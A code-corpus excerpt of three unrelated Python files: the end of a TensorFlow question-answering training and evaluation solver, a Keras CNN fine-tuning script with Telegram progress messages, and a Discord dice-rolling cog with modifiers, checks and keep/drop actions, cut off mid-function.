batch_final_loss = self.model.final_loss
summary, _, loss, grad_norm= sess.run([merged, train_op, batch_final_loss, grad_norm], input_feed)
train_writer.add_summary(summary, iters)
ep_loss += loss
losses.append(loss)
norms.append(grad_norm)
iters += 1
if iters % print_every == 0:
toc = time.time()
logging.info('iters: {}/{} loss: {} norm: {}. time: {} secs'.format(
iters, total_iterations, loss, grad_norm, toc - tic))
tf1, tem, f1, em = self.evaluate_answer(sess, self.dataset, self.raw_answers, self.rev_vocab,
training=True, log=True, sample=self.sample)
train_evals.append((tf1, tem))
val_evals.append((f1, em))
tic = time.time()
if iters % self.save_every == 0:
saver.save(sess, save_path, global_step=iters)
self.evaluate_answer(sess, self.dataset, self.raw_answers, self.rev_vocab,
training=True, log=True, sample=self.sample)
if self.save_every_epoch:
saver.save(sess, save_path, global_step=iters)
self.evaluate_answer(sess, self.dataset, self.raw_answers, self.rev_vocab,
training=True, log=True, sample=4000)
logging.info('average loss of epoch {}/{} is {}'.format(ep + 1, self.epochs, ep_loss / batch_num))
data_dict = {'losses': losses, 'norms': norms,
'train_eval': train_evals, 'val_eval': val_evals}
c_time = time.strftime('%Y%m%d_%H%M', time.localtime())
data_save_path = pjoin('cache', str(iters) + 'iters' + c_time + '.npz')
np.savez(data_save_path, data_dict)
def evaluate_answer(self, sess, dataset, raw_answers, rev_vocab,
sample=(100, 100), log=False, training=False):
"""
Evaluate the model's performance using the harmonic mean of F1 and Exact Match (EM)
with the set of true answer labels
This step actually takes quite some time. So we can only sample 100 examples
from either training or testing set.
:param session: session should always be centrally managed in train.py
:param dataset: a representation of our data, in some implementations, you can
pass in multiple components (arguments) of one dataset to this function
:param sample: how many examples in dataset we look at
:param log: whether we print to std out stream
:return:
"""
if not isinstance(rev_vocab, np.ndarray):
rev_vocab = np.array(rev_vocab)
if not isinstance(sample, tuple):
sample = (sample, sample)
tf1 = 0.
tem = 0.
input_batch_size = 100
if training:
train_len = sample[0]
train_context = dataset['train_context'][:train_len]
train_question = dataset['train_question'][:train_len]
train_answer = raw_answers['raw_train_answer'][:train_len]
train_a_s = np.array([], dtype=np.int32)
train_a_e = np.array([], dtype=np.int32)
for i in tqdm(range(train_len // input_batch_size), desc='trianing set'):
train_as, train_ae = self.answer(self.model, sess,
np.array(train_context[i * input_batch_size:(i + 1) * input_batch_size]),
np.array(train_question[i * input_batch_size:(i + 1) * input_batch_size]))
train_a_s = np.concatenate((train_a_s, train_as), axis=0)
train_a_e = np.concatenate((train_a_e, train_ae), axis=0)
# a_s and a_e -> (sample_num)
for i in range(train_len):
prediction_ids = train_context[i][0][train_a_s[i]:train_a_e[i]+1]
prediction_answer = ' '.join(rev_vocab[prediction_ids])
raw_answer = train_answer[i]
tf1 += f1_score(prediction_answer, raw_answer)
tem += exact_match_score(prediction_answer, raw_answer)
# if i < 10:
# print("predict_answer: ", prediction_answer)
# print("ground truth: ", raw_answer)
# print ("f1: ", f1_score(prediction_answer, raw_answer))
if log:
logging.info("Training set ==> F1: {}, EM: {}, for {} samples".
format(tf1 / train_len, tem / train_len, train_len))
f1 = 0.
em = 0.
val_len = sample[1]
val_context = dataset['val_context'][:val_len]
val_question = dataset['val_question'][:val_len]
val_answer = raw_answers['raw_val_answer'][:val_len]
val_a_s = np.array([], dtype=np.int32)
val_a_e = np.array([], dtype=np.int32)
for i in tqdm(range(val_len // input_batch_size), desc='val set'):
val_as, val_ae = self.answer(self.model, sess,
np.array(val_context[i * input_batch_size:(i + 1) * input_batch_size]),
np.array(val_question[i * input_batch_size:(i + 1) * input_batch_size]))
val_a_s = np.concatenate((val_a_s, val_as), axis=0)
val_a_e = np.concatenate((val_a_e, val_ae), axis=0)
# a_s and a_e -> (sample_num)
for i in range(val_len):
prediction_ids = val_context[i][0][val_a_s[i]:val_a_e[i]+1]
prediction_answer = ' '.join(rev_vocab[prediction_ids])
raw_answer = val_answer[i]
f1 += f1_score(prediction_answer, raw_answer)
em += exact_match_score(prediction_answer, raw_answer)
# if i < 10:
# print("predict_answer: ", prediction_answer)
# print("ground truth: ", raw_answer)
# print ("f1: ", f1_score(prediction_answer, raw_answer))
if log:
logging.info("val set ==> F1: {}, EM: {}, for {} samples".
format(f1 / val_len, em / val_len, val_len))
if training:
return tf1/train_len, tem/train_len, f1/val_len, em/val_len
else:
return f1/val_len, em/val_len
def answer(self, model, session, context, question):
"""
Returns the probability distribution over different positions in the paragraph
so that other methods like self.answer() will be able to work properly
:return:
"""
input_feed = {}
input_feed[model.context] = context[:, 0, :]
input_feed[model.context_m] = context[:, 1, :]
input_feed[model.question] = question[:, 0, :]
input_feed[model.question_m] = question[:, 1, :]
output_feed = [model.s_score, model.e_score]
s_score, e_score = session.run(output_feed, input_feed)
a_s = np.argmax(s_score, axis=1)
a_e = np.argmax(e_score, axis=1)
return a_s, a_e
def load_input_feed(self, context, question, answer):
model = self.model
input_feed = {}
input_feed[model.context] = context[:, 0, :]
input_feed[model.context_m] = context[:, 1, :]
input_feed[model.question] = question[:, 0, :]
input_feed[model.question_m] = question[:, 1, :]
input_feed[model.answer_s] = answer[:, 0]
input_feed[model.answer_e] = answer[:, 1]
input_feed[model.starter_learning_rate] = self.start_lr
return input_feed
| jeffrey1hu/context-based-qa-system | core/solver.py | solver.py | py | 12,925 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "tensorflow.train",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.Variable",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "tensorflow.placeholder",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "tens... |
3018933371 | # -*- coding: utf-8 -*-
"""
Training deep convolutional neural networks.
Created on Thu Jul 5 11:00:00 2018
Author: Prasun Roy | CVPRU-ISICAL (http://www.isical.ac.in/~cvpr)
GitHub: https://github.com/prasunroy/cnn-on-degraded-images
"""
# imports
from __future__ import division
from __future__ import print_function
import glob
import json
import numpy
import os
import tensorflow
from keras import applications
from keras import optimizers
from keras.callbacks import CSVLogger
from keras.callbacks import EarlyStopping
from keras.callbacks import ModelCheckpoint
from keras.callbacks import TensorBoard
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import Flatten
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
from matplotlib import pyplot
from libs.PipelineUtils import shutdown
from mlutils.callbacks import Telegram
# configurations
# -----------------------------------------------------------------------------
PROCESS_SEED = None
ARCHITECTURE = 'inceptionv3'
INCLUDE_TOPL = False
WEIGHTS_INIT = 'imagenet'
INPUT_TENSOR = None
INPUT_DSHAPE = (299, 299, 3)
POOLING_TYPE = None
NUM_TCLASSES = 10
FREEZE_LAYER = 0
NEURONS_FC_1 = 1024
NEURONS_FC_2 = 1024
DROPOUT_FC12 = 0.5
FN_OPTIMIZER = optimizers.sgd(lr=0.0001, momentum=0.5)
DATASET_ID = 'synthetic_digits'
DATA_TRAIN = 'data/{}/imgs_train/'.format(DATASET_ID)
DATA_VALID = 'data/{}/imgs_valid/'.format(DATASET_ID)
LABEL_MAPS = 'data/{}/labelmap.json'.format(DATASET_ID)
SAVE_AUGMT = False
BATCH_SIZE = 50
NUM_EPOCHS = 100
OUTPUT_DIR = 'output/{}/{}/'.format(DATASET_ID, ARCHITECTURE)
AUTH_TOKEN = None
TELCHAT_ID = None
F_SHUTDOWN = False
# -----------------------------------------------------------------------------
# setup seed for random number generators for reproducibility
numpy.random.seed(PROCESS_SEED)
tensorflow.set_random_seed(PROCESS_SEED)
# setup paths for augmented data
if SAVE_AUGMT:
aug_dir_train = os.path.join(OUTPUT_DIR, 'augmented_data/imgs_train/')
aug_dir_valid = os.path.join(OUTPUT_DIR, 'augmented_data/imgs_valid/')
else:
aug_dir_train = None
aug_dir_valid = None
# setup paths for model architecture
mdl_dir = os.path.join(OUTPUT_DIR, 'models')
mdl_file = os.path.join(mdl_dir, '{}.json'.format(ARCHITECTURE))
# setup paths for callbacks
log_dir = os.path.join(OUTPUT_DIR, 'logs')
cpt_dir = os.path.join(OUTPUT_DIR, 'checkpoints')
tbd_dir = os.path.join(OUTPUT_DIR, 'tensorboard')
log_file = os.path.join(log_dir, 'training.csv')
cpt_best = os.path.join(cpt_dir, '{}_best.h5'.format(ARCHITECTURE))
cpt_last = os.path.join(cpt_dir, '{}_last.h5'.format(ARCHITECTURE))
# validate paths
def validate_paths():
flag = True
data_dirs = [DATA_TRAIN, DATA_VALID]
for directory in data_dirs:
if not os.path.isdir(directory):
print('[INFO] Data directory not found at {}'.format(directory))
flag = False
output_dirs = [OUTPUT_DIR, aug_dir_train, aug_dir_valid, mdl_dir, log_dir, cpt_dir, tbd_dir]
output_dirs = [directory for directory in output_dirs if directory is not None]
for directory in output_dirs:
if not os.path.isdir(directory):
os.makedirs(directory)
elif len(glob.glob(os.path.join(directory, '*.*'))) > 0:
print('[INFO] Output directory {} must be empty'.format(directory))
flag = False
return flag
# load data
def load_data():
# image data generator configuration for training data augmentation
data_gen_train = ImageDataGenerator(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-06,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
brightness_range=None,
shear_range=0.0,
zoom_range=0.0,
channel_shift_range=0.0,
fill_mode='nearest',
cval=0.0,
horizontal_flip=False,
vertical_flip=False,
rescale=1.0/255.0,
preprocessing_function=None,
data_format=None,
validation_split=0.0)
# image data generator configuration for validation data augmentation
data_gen_valid = ImageDataGenerator(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-06,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
brightness_range=None,
shear_range=0.0,
zoom_range=0.0,
channel_shift_range=0.0,
fill_mode='nearest',
cval=0.0,
horizontal_flip=False,
vertical_flip=False,
rescale=1.0/255.0,
preprocessing_function=None,
data_format=None,
validation_split=0.0)
# training image data generator
data_flow_train = data_gen_train.flow_from_directory(directory=DATA_TRAIN,
target_size=INPUT_DSHAPE[:-1],
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=BATCH_SIZE,
shuffle=True,
seed=PROCESS_SEED,
save_to_dir=aug_dir_train,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest')
# validation image data generator
data_flow_valid = data_gen_valid.flow_from_directory(directory=DATA_VALID,
target_size=INPUT_DSHAPE[:-1],
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=BATCH_SIZE,
shuffle=True,
seed=PROCESS_SEED,
save_to_dir=aug_dir_valid,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest')
return (data_flow_train, data_flow_valid)
# build model
def build_model():
model = None
# create architecture
if ARCHITECTURE.lower() == 'inceptionv3':
model = applications.inception_v3.InceptionV3(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'mobilenet':
model = applications.mobilenet.MobileNet(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'resnet50':
model = applications.resnet50.ResNet50(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'vgg16':
model = applications.vgg16.VGG16(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
elif ARCHITECTURE.lower() == 'vgg19':
model = applications.vgg19.VGG19(include_top=INCLUDE_TOPL, weights=WEIGHTS_INIT, input_tensor=INPUT_TENSOR, input_shape=INPUT_DSHAPE, pooling=POOLING_TYPE, classes=NUM_TCLASSES)
if not model is None:
# freeze layers
if FREEZE_LAYER < 0:
for layer in model.layers:
layer.trainable = False
else:
for layer in model.layers[:FREEZE_LAYER]:
layer.trainable = False
# add fully connected layers
if not INCLUDE_TOPL:
x = model.output
x = Flatten()(x)
x = Dense(NEURONS_FC_1, activation='relu')(x)
x = Dropout(DROPOUT_FC12)(x)
x = Dense(NEURONS_FC_2, activation='relu')(x)
y = Dense(NUM_TCLASSES, activation='softmax')(x)
# final architecture
model_final = Model(inputs=model.input, outputs=y)
else:
model_final = model
# compile the final model
model_final.compile(optimizer=FN_OPTIMIZER, loss='categorical_crossentropy', metrics=['accuracy'])
return model_final
# create callbacks
def callbacks():
cb_log = CSVLogger(filename=log_file, append=True)
cb_stp = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)
cb_cpt_best = ModelCheckpoint(filepath=cpt_best, monitor='val_acc', save_best_only=True, save_weights_only=True, verbose=1)
cb_cpt_last = ModelCheckpoint(filepath=cpt_last, monitor='val_acc', save_best_only=False, save_weights_only=True, verbose=0)
cb_tbd = TensorBoard(log_dir=tbd_dir, batch_size=BATCH_SIZE, write_grads=True, write_images=True)
cb_tel = Telegram(auth_token=AUTH_TOKEN, chat_id=TELCHAT_ID, monitor='val_acc', out_dir=OUTPUT_DIR)
return [cb_log, cb_stp, cb_cpt_best, cb_cpt_last, cb_tbd, cb_tel]
# plot learning curve
def plot(train_history):
# plot training and validation loss
pyplot.figure()
pyplot.plot(train_history.history['loss'], label='loss')
pyplot.plot(train_history.history['val_loss'], label='val_loss')
pyplot.title('Training and Validation Loss')
pyplot.xlabel('epoch')
pyplot.ylabel('loss')
pyplot.legend()
pyplot.savefig(os.path.join(log_dir, 'plot_loss.png'))
pyplot.show(block=False)
# plot training and validation accuracy
pyplot.figure()
pyplot.plot(train_history.history['acc'], label='acc')
pyplot.plot(train_history.history['val_acc'], label='val_acc')
pyplot.title('Training and Validation Accuracy')
pyplot.xlabel('epoch')
pyplot.ylabel('accuracy')
pyplot.legend()
pyplot.savefig(os.path.join(log_dir, 'plot_accuracy.png'))
pyplot.show(block=False)
return
# train model
def train():
# validate paths
if not validate_paths():
return
# load data
(data_flow_train, data_flow_valid) = load_data()
# save labelmap
with open(LABEL_MAPS, 'w') as file:
json.dump(data_flow_train.class_indices, file)
print('[INFO] Created labelmap')
# build model
print('[INFO] Building model... ', end='')
model = build_model()
if model is None:
print('failed')
return
else:
print('done')
model.summary()
# serialize model to json
model_json = model.to_json()
with open(mdl_file, 'w') as file:
file.write(model_json)
# create callbacks
cb_list = callbacks()
# acknowledgement
data = {'chat_id': TELCHAT_ID,
'text': '`Received a new training request.\nTASK ID: {}\nMODEL : {}\nDATASET: {}`'\
.format(cb_list[-1]._task_id, ARCHITECTURE.upper(), DATASET_ID.upper()),
'parse_mode': 'Markdown'}
cb_list[-1]._send_message(data)
# train model
train_history = model.fit_generator(generator=data_flow_train,
steps_per_epoch=None,
epochs=NUM_EPOCHS,
verbose=1,
callbacks=cb_list,
validation_data=data_flow_valid,
validation_steps=None,
class_weight=None,
max_queue_size=10,
workers=1,
use_multiprocessing=False,
shuffle=True,
initial_epoch=0)
# plot learning curve
plot(train_history)
return
# main
if __name__ == '__main__':
train()
if F_SHUTDOWN:
shutdown()
| prasunroy/cnn-on-degraded-images | train_deepcnn.py | train_deepcnn.py | py | 14,364 | python | en | code | 14 | github-code | 1 | [
{
"api_name": "keras.optimizers.sgd",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "keras.optimizers",
"line_number": 53,
"usage_type": "name"
},
{
"api_name": "numpy.random.seed",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.random"... |
39159734260 | """Utilities shared across the whole cog"""
# Built-in
import random
import re
# Third-party
from discord import Color
# Local
from .embed import create_embed, create_error_embed
from .settings import DEFAULT_USER_SETTINGS
# --------------------------------------------------------------------------------
# > Constants
# --------------------------------------------------------------------------------
DICE_REGEX = re.compile(r"(?P<qty>[1-9]\d{0,2})d(?P<sides>[1-9]\d{0,2})")
SIMPLE_ACTION_REGEX = re.compile(r"adv|dis|crit")
COMPLEX_ACTION_REGEX = re.compile(r"(?P<action>dl|dh|kl|kh)(?P<value>[1-9]\d{0,2})")
CHECK_REGEX = re.compile(r"(?P<comparator>=|!=|>|<|>=|<=)(?P<value>[1-9]\d{0,4})")
MODIFIER_REGEX = re.compile(r"[-+][1-9]\d{0,4}")
# --------------------------------------------------------------------------------
# > Base helpers
# --------------------------------------------------------------------------------
def generate_discord_markdown_string(lines):
"""
Wraps a list of message into a discord markdown block
:param [str] lines:
:return: The wrapped string
:rtype: str
"""
output = ["```markdown"] + lines + ["```"]
return "\n".join(output)
class Die:
"""A die you can roll"""
def __init__(self, sides):
"""
Creates a die of N sides that can be rolled
:param int sides: Number of sides the die have
"""
self.sides = sides
self.value = None
def roll(self):
"""
:return: Rolls the die and returns the value
:rtype: int
"""
self.value = random.randint(1, self.sides)
return self.value
def copy(self):
"""
:return: Creates and returns an identical Die from our instance
:rtype: Die
"""
die = Die(self.sides)
die.value = self.value
return die
class RollComponent:
"""Provides the skeleton for a DiceRoll component"""
def __init__(self, dice_roll):
"""
Initializes the component
:param DiceRoll dice_roll: The DiceRoll instance the component is linked to
"""
self.dice_roll = dice_roll
self.errors = []
def validate(self):
"""Should fill the `errors` property"""
NotImplemented()
def apply(self):
"""Should update the `dice_roll.total`"""
NotImplemented()
def update_embed(self, embed):
"""
Should add a field and content to an existing embed
:param Embed embed: An existing discord Embed message
"""
NotImplemented()
# --------------------------------------------------------------------------------
# > Modifier Component
# --------------------------------------------------------------------------------
class RollModifier(RollComponent):
"""Applies a modifier at the end of your DiceRoll"""
def __init__(self, dice_roll, value):
"""
Initializes the instance
:param DiceRoll dice_roll: The DiceRoll instance to link it to
:param int value: The modifier amount (can be negative)
"""
super().__init__(dice_roll)
self.value = value
def validate(self):
"""Adds an error if the value is at 0"""
if self.value == 0:
message = "[Modifier] Cannot have a modifier of 0"
self.errors.append(message)
def apply(self):
"""Updates the DiceRoll total by adding the modifier value"""
self.dice_roll.total += self.value
def update_embed(self, embed):
"""
Adds a field which indicates the new total after the modifier was applied
:param Embed embed: The embed massage to update
"""
if not self.dice_roll.settings["verbose"]:
return
sign = "+" if self.value > 0 else "-"
abs_value = abs(self.value)
previous_total = self.dice_roll.total - self.value
message = f"# {previous_total} {sign} {abs_value} = {self.dice_roll.total}"
text = generate_discord_markdown_string([message])
embed.add_field(
name=f"Modifier {sign}{abs_value}",
value=text,
inline=False,
)
# --------------------------------------------------------------------------------
# > Check Component
# --------------------------------------------------------------------------------
class RollCheck(RollComponent):
"""Performs a check at the very end of your DiceRoll"""
def __init__(self, dice_roll, comparator, value):
"""
Initializes the instance
:param DiceRoll dice_roll: The DiceRoll instance to link it to
:param str comparator: Comparaison that will be used, like > or <=
:param int value: The value on the right side of the equation
"""
super().__init__(dice_roll)
self.comparator = comparator
self.value = value
self.success = None
def validate(self):
"""Nothing to validate. Already done by the regex in DiceRoll"""
pass
def apply(self):
"""Compares the DiceRoll total to the provided value, using the comparator"""
self.success = eval(f"{self.dice_roll.total} {self.comparator} {self.value}")
def update_embed(self, embed):
"""
Updates the title and color of the message based on the check results
:param Embed embed: The embed message to update
"""
if self.success:
color = Color.green()
title = f"Success with {self.dice_roll.total}!"
else:
color = Color.orange()
title = f"Failure with {self.dice_roll.total}!"
embed.title = title
embed.color = color
# --------------------------------------------------------------------------------
# > Action Component
# --------------------------------------------------------------------------------
def create_roll_action(dice_roll, name, value=0):
"""
Creates and returns the matching action using the right parameters
:param DiceRoll dice_roll: The DiceRoll instance to link it to
:param str name: Name or shortcut of the action
:param int value: Value associated with the action
:return: The created BaseAction that matches the provided name
:rtype: BaseAction
"""
action_map = {
"dl": (KeepDropAction, [value, False, False]),
"dh": (KeepDropAction, [value, False, True]),
"kl": (KeepDropAction, [value, True, False]),
"kh": (KeepDropAction, [value, True, True]),
"adv": (Advantage, []),
"dis": (Disadvantage, []),
"crit": (CriticalHit, []),
}
action_class, args = action_map[name]
return action_class(dice_roll, *args)
class BaseAction(RollComponent):
"""Base class to provide utilities to all actual Actions"""
name = None
def __init__(self, dice_roll):
"""
Initializes the action
:param DiceRoll dice_roll: The DiceRoll instance to link it to
"""
super().__init__(dice_roll)
self.dice_roll = dice_roll
def _validate_one_die(self):
"""Adds an error if there is more than 1 dice"""
if len(self.dice_roll.dice) != 1:
message = f"[Action] `{self.name}` action can only be used with 1 die."
self.errors.append(message)
def _validate_one_die_type(self):
"""Adds an error if we have several dice types"""
dice_sides = {die.sides for die in self.dice_roll.dice}
if len(dice_sides) > 1:
message = f"[Action] `{self.name}` action cannot be used with dice of different sizes."
self.errors.append(message)
class Advantage(BaseAction):
"""Action to roll a second die and keep the best one"""
name = "Advantage"
def __init__(self, dice_roll):
"""
Initializes the action and its state
:param DiceRoll dice_roll: The DiceRoll instance to link it to
"""
super().__init__(dice_roll)
self.existing_die = None
self.die = None
def validate(self):
"""Checks if the DiceRoll only has one die"""
self._validate_one_die()
def apply(self):
"""Copies the existing die, re-rolls it, and keeps it if it's better"""
self.existing_die = self.dice_roll.dice[0]
self.die = self.existing_die.copy()
self.die.roll()
if self.die.value > self.existing_die.value:
self.dice_roll.total = self.die.value
def update_embed(self, embed):
"""
Adds a field with the action result
:param Embed embed: Embed message to update
"""
if not self.dice_roll.settings["verbose"]:
return
if self.die.value > self.existing_die.value:
result = f"Rolled {self.die.value} and kept it!"
else:
result = f"Rolled {self.die.value} and discarded it!"
text = generate_discord_markdown_string([result])
embed.add_field(
name=self.name,
value=text,
inline=False,
)
class Disadvantage(BaseAction):
"""Action to roll a second die and keep the worse one"""
name = "Disadvantage"
def __init__(self, dice_roll):
"""
Initializes the action and its state
:param DiceRoll dice_roll: The DiceRoll instance to link it to
"""
super().__init__(dice_roll)
self.existing_die = None
self.die = None
def validate(self):
"""Checks if the DiceRoll only has one die"""
self._validate_one_die()
def apply(self):
"""Copies the existing die, re-rolls it, and keeps it if it's worse"""
self.existing_die = self.dice_roll.dice[0]
self.die = self.existing_die.copy()
self.die.roll()
if self.die.value < self.existing_die.value:
self.dice_roll.total = self.die.value
def update_embed(self, embed):
"""
Adds a field with the action result
:param Embed embed: Embed message to update
"""
if not self.dice_roll.settings["verbose"]:
return
if self.die.value < self.existing_die.value:
result = f"Rolled {self.die.value} and kept it!"
else:
result = f"Rolled {self.die.value} and discarded it!"
text = generate_discord_markdown_string([result])
embed.add_field(
name=self.name,
value=text,
inline=False,
)
class CriticalHit(BaseAction):
"""Action to make a critical hit and double your dice/damage output"""
name = "Critical hit"
def validate(self):
"""Nothing to validate"""
pass
def apply(self):
"""Multiplies the dice score by 2"""
self.before_total = self.dice_roll.total
self.dice_roll.total *= 2
self.after_total = self.dice_roll.total
def update_embed(self, embed):
"""
Adds a field indicating the new total
:param Embed embed: Embed message to update
"""
if not self.dice_roll.settings["verbose"]:
return
messages = [
"All your dice scores are multiplied by 2",
f"# {self.before_total} x 2 = {self.after_total}",
]
text = generate_discord_markdown_string(messages)
embed.add_field(
name=self.name,
value=text,
inline=False,
)
class KeepDropAction(BaseAction):
"""Action to keep or drop dice"""
def __init__(self, dice_roll, amount, keep, high):
"""
Initializes the action and its state
:param DiceRoll dice_roll: The DiceRoll instance to link it to
:param int amount: Amount of dice to keep or drop
:param bool keep: Whether we keep (or drop)
:param bool high: Whether the remaining dice are the highest (or lowest)
"""
super().__init__(dice_roll)
self.remaining_dice = []
self.discarded_dice = []
self.amount = amount
self.keep = keep
self.high = high
self.name = self._compute_name()
def validate(self):
"""Checks the dice count and types"""
self._validate_one_die_type()
self._validate_drop_keep_count(self.amount)
def apply(self):
"""
Keeps/drops the dice by splitting them into `remaining` and `discarded`
Then updates the total by add the `remaining` only
"""
dice = self.dice_roll.dice.copy()
dice.sort(key=lambda x: x.value, reverse=self.high)
if self.keep:
# Keep High
if self.high:
self.remaining_dice = dice[: self.amount]
self.discarded_dice = dice[self.amount :]
# Keep Low
else:
self.remaining_dice = dice[self.amount :]
self.discarded_dice = dice[: self.amount]
else:
# Drop High
if self.high:
self.remaining_dice = dice[self.amount :]
self.discarded_dice = dice[: self.amount]
# Drop Low
else:
self.remaining_dice = dice[: self.amount]
self.discarded_dice = dice[self.amount :]
self.before_total = self.dice_roll.total
self.dice_roll.total = sum([die.value for die in self.remaining_dice])
self.after_total = self.dice_roll.total
def update_embed(self, embed):
"""
Adds a field which list the discarded and remaining dice
:param Embed embed: The embed message to update
"""
if not self.dice_roll.settings["verbose"]:
return
remaining_values = [str(die.value) for die in self.remaining_dice]
discarded_values = [str(die.value) for die in self.discarded_dice]
messages = [
f"[Discarded dice]({', '.join(discarded_values)})",
f"[Remaining dice]({', '.join(remaining_values)})",
f"Went down from {self.before_total} to {self.after_total}",
]
text = generate_discord_markdown_string(messages)
embed.add_field(
name=self.name,
value=text,
inline=False,
)
def _compute_name(self):
"""
:return: Computes and returns the action name based on its attributes
:rtype: str
"""
verb = "Keep" if self.keep else "Drop"
direction = "high" if self.high else "low"
return f"{verb} {direction} {self.amount}"
def _validate_drop_keep_count(self, n):
"""
Adds an error if we cannot drop/keep that many dice
:param int n: Number of dice to drop/keep
"""
if len(self.dice_roll.dice) <= n:
message = f"[Action] You must roll more dice (`{n}`) than what you drop/keep (`{self.amount}`)."
self.errors.append(message)
# --------------------------------------------------------------------------------
# > Dice Roll
# --------------------------------------------------------------------------------
class DiceRoll:
"""The state and action of rolling dice with various options"""
def __init__(self, instructions, settings):
"""
Initializes the state, then parses and validates the instructions
:param [str] instructions: The user's instructions, like "1d6" or "adv"
:param dict settings: The settings to use in ths roll
"""
self.instructions = instructions
self.settings = {**DEFAULT_USER_SETTINGS, **settings}
# Roll parameters
self.dice = []
self.modifier = None
self.action = None
self.check = None
# Results
self.total = 0
self.rolled = False
# Error control
self.action_counter = 0
self.check_counter = 0
self.modifier_counter = 0
self._errors = []
# Parsing
self._parse_instructions()
self._validate()
# ----------------------------------------
# API properties
# ----------------------------------------
@property
def components(self):
"""
:return: The ordered component instances linked to our DiceRoll
:rtype: [RollComponent]
"""
# Order matters
potential_components = [self.action, self.modifier, self.check]
return [c for c in potential_components if c is not None]
@property
def is_valid(self):
"""
:return: Whether the instance is valid and can be played
:rtype: bool
"""
return len(self.errors) == 0
@property
def errors(self):
"""
:return: The instance's and its components' errors
:rtype: [str]
"""
component_errors = []
for component in self.components:
component_errors.extend(component.errors)
return self._errors + component_errors
@property
def errors_as_embed(self):
"""
:return: Formats the errors into a Discord Embed
:rtype: Embed
"""
description = "\n".join(self.errors)
return create_error_embed(description=description)
@property
def result_as_embed(self):
"""
:return: Formats our instance's result into a Discord Embed
:rtype: Embed
"""
title = f"You rolled {self.total}"
embed = create_embed(title=title)
if self.settings["verbose"]:
self._update_embed_with_dice_rolls(embed)
for component in self.components:
# "verbose" is handled individually in each component
component.update_embed(embed)
return embed
# ----------------------------------------
# API methods
# ----------------------------------------
def roll(self):
"""
If valid: rolls the dice, applies all components, and returns the results
Else: returns the errors
:return: The embed results or errors
:rtype: Embed
"""
# Maybe skip
if self.rolled:
raise RuntimeError("This DiceRoll has already been rolled")
if not self.is_valid:
return self.errors_as_embed
# Do roll
for die in self.dice:
self.total += die.roll()
for component in self.components:
component.apply()
self.rolled = True
return self.result_as_embed
def copy(self):
"""
:return: A new DiceRoll using our instance's instructions and settings
:rtype: DiceRoll
"""
return DiceRoll(self.instructions, self.settings)
# ----------------------------------------
# Helpers: parsing
# ----------------------------------------
def _parse_instructions(self):
"""Tries to parse all instruction using our regexes"""
parsing_functions = [
self._maybe_parse_dice,
self._maybe_parse_action,
self._maybe_parse_modifier,
self._maybe_parse_check,
]
for instruction in self.instructions:
for parsing_func in parsing_functions:
if parsing_func(instruction):
break
else:
message = (
f"[Instruction] Did not understand the instruction: `{instruction}`"
)
self._errors.append(message)
def _maybe_parse_dice(self, instruction):
"""
Checks if the instruction is a dice roll
:param str instruction: String to parse
:return: Whether it was a match
:rtype: bool
"""
match = re.fullmatch(DICE_REGEX, instruction)
if match is not None:
qty = int(match.group("qty"))
sides = int(match.group("sides"))
for i in range(qty):
self.dice.append(Die(sides))
return True
return False
def _maybe_parse_action(self, instruction):
"""
Checks if the instruction is an action call
:param str instruction: String to parse
:return: Whether it was a match
:rtype: bool
"""
match = re.fullmatch(SIMPLE_ACTION_REGEX, instruction)
if match is not None:
self.action = create_roll_action(self, instruction)
self.action_counter += 1
return True
match = re.fullmatch(COMPLEX_ACTION_REGEX, instruction)
if match is not None:
action_text = match.group("action")
value = int(match.group("value"))
self.action = create_roll_action(self, action_text, value)
self.action_counter += 1
return True
return False
def _maybe_parse_modifier(self, instruction):
"""
Checks if the instruction is to apply a modifier
:param str instruction: String to parse
:return: Whether it was a match
:rtype: bool
"""
match = re.fullmatch(MODIFIER_REGEX, instruction)
if match is not None:
value = int(instruction)
self.modifier = RollModifier(self, value)
self.modifier_counter += 1
return True
return False
def _maybe_parse_check(self, instruction):
"""
Checks if the instruction is roll check/condition
:param str instruction: String to parse
:return: Whether it was a match
:rtype: bool
"""
match = re.fullmatch(CHECK_REGEX, instruction)
if match is not None:
comparator = match.group("comparator")
value = int(match.group("value"))
self.check = RollCheck(self, comparator, value)
self.check_counter += 1
return True
return False
# ----------------------------------------
# Helpers: validation
# ----------------------------------------
def _validate(self):
"""Checks if our instance and its components are valid based on their states"""
# Has dice
if len(self.dice) == 0:
message = "[Dice] You must provide at least one die (example: `1d6`)"
self._errors.append(message)
# Has 1 component of each max
for text, counter in zip(
["Action", "Modifier", "Check"],
[self.action_counter, self.modifier_counter, self.check_counter],
):
